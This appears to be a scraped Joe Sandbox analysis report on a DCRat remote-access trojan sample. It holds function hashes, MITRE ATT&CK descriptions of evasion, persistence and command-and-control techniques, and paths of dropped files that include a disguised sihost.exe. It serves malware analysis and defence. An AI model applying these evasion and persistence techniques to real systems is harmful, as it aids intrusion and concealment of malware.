Snapshot File: hcaresult_38_2_7ff848f30000_Idle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fe8795a272dadb8bb6af11d3dcbc5c65920d5c2da652ffeffb3a97b9837552e
Instruction ID: 0d86a8cc8d3c854d13589092fdf05be0ba7e95fc4eb6bd462a5676def97b0342
Opcode Fuzzy Hash: 4fe8795a272dadb8bb6af11d3dcbc5c65920d5c2da652ffeffb3a97b9837552e
Instruction Fuzzy Hash: 9EC08C20D2F80F0AF405B32E14020ACA1005BC4390FD001B3C80C401C5AE0D21C5026E

Function 00007FF848F306C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2320960187.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f30000_Idle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a967f3c778237060e295b8758f84fd0012577d6ea661a812beb46ef2f8a89ce6
Instruction ID: c5f6d50508a4809d876c37d1e3f8c86f013ae2530f61b38e5336eaeb995bd724
Opcode Fuzzy Hash: a967f3c778237060e295b8758f84fd0012577d6ea661a812beb46ef2f8a89ce6
Instruction Fuzzy Hash: C7B01210C7F44F05E408337A084206970405B84244FC001F2D80C501C1994D1094036A

Function 00007FF848F34B95 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2320960187.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f30000_Idle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fa913ab83c13ea269090e6e9798ac3dd922ec5946686a66c3bd59b216f50c34
Instruction ID: 10482da17dc50666d7944edef1e2c6e5ccdff4e75df360de3bf34439f11fe778
Opcode Fuzzy Hash: 9fa913ab83c13ea269090e6e9798ac3dd922ec5946686a66c3bd59b216f50c34
Instruction Fuzzy Hash:

Non-executed Functions

Function 00007FF848F309B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON

Download Yara Rule

Strings

#{9, xrefs: 00007FF848F30B3E
c9, xrefs: 00007FF848F30B56
!k9, xrefs: 00007FF848F30B4E
"s9, xrefs: 00007FF848F30B46

Memory Dump Source

Source File: 00000026.00000002.2320960187.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f30000_Idle.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 363e173b441e8781b69fcc595ceb6685bdfc454e08dbee62e5043189dddcb4a7
Instruction ID: 70d13471ac54828c3a83f4fd5d5ce9033454167d368661a65340fac12893f821
Opcode Fuzzy Hash: 363e173b441e8781b69fcc595ceb6685bdfc454e08dbee62e5043189dddcb4a7
Instruction Fuzzy Hash: 33413A16A2F46AA9E65137BD74521FE6B64EF812B9F084377E44C8D1C38E0C608682FD

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report F3ePjP272h.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Reference Assemblies\897f7819a04651

C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe

C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe:Zone.Identifier

C:\Program Files (x86)\Windows Mail\897f7819a04651

C:\Program Files (x86)\Windows Mail\jmfWpjtPWHWFodUifDHiQtgxi.exe

C:\Program Files (x86)\Windows Mail\jmfWpjtPWHWFodUifDHiQtgxi.exe:Zone.Identifier

C:\Program Files\MSBuild\Microsoft\897f7819a04651

C:\Program Files\MSBuild\Microsoft\jmfWpjtPWHWFodUifDHiQtgxi.exe

C:\Program Files\MSBuild\Microsoft\jmfWpjtPWHWFodUifDHiQtgxi.exe:Zone.Identifier

C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\66fc9ff0ee96c2

C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe

C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe:Zone.Identifier

Windows Analysis Report
F3ePjP272h.exe